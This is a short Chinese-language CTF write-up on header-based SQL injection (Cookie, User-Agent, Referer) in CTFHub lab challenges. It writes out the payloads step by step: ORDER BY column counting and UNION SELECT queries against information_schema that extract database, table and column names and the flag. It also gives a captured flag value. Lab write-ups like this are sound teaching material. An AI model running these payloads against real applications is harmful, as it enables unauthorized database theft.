目录
一、cookie注入
1、进题目抓包
2、cookie处存在注入点,判断注入点类型
判断为数字型注入
3、列数和回显位置判断
使用order by 判断列数为2;
回显位置如下:
4、直接获取数据
(1)、表名
(2)、列名
(3)、flag
flag:ctfhub{a6cfdaf369745f386f20266f}
二、UA注入
1、抓包看注入点类型
数字型注入,字段数为2,回显如下:
2、其他步骤与cookie注入类似
1、获取数据库名
id=-1 union select 1,database() #
2、获取表名
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
3、获取列名,我的表名是:afnyhykzod
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='afnyhykzod'#
4、获取数据,我获取到的列名是:tzbuzzpllg
id=-1 union select 1,tzbuzzpllg from afnyhykzod #
flag如下:
三、Refer注入
1、hackbar勾选Refer
2、在Refer处进行注入,其他步骤类似